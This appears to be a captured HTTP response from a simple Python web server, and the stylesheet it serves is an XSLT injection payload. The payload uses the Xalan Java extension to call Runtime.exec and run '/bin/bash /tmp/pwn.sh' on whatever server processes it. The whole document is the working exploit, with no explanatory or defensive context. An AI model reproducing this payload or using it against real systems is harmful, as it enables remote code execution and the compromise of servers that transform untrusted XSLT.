HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.7.17
Date: Thu, 30 Apr 2020 21:42:10 GMT
Content-type: application/xslt+xml
Content-Length: 520
Last-Modified: Thu, 30 Apr 2020 21:41:46 GMT

<?xml version="1.0" ?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" omit-xml-declaration="yes"/>
<xsl:template match="/"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<root>
<xsl:variable name="rtObj" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtObj, '/bin/bash /tmp/pwn.sh')"/>
Process: <xsl:value-of select="$process"/>
</root>
</xsl:template>
</xsl:stylesheet>
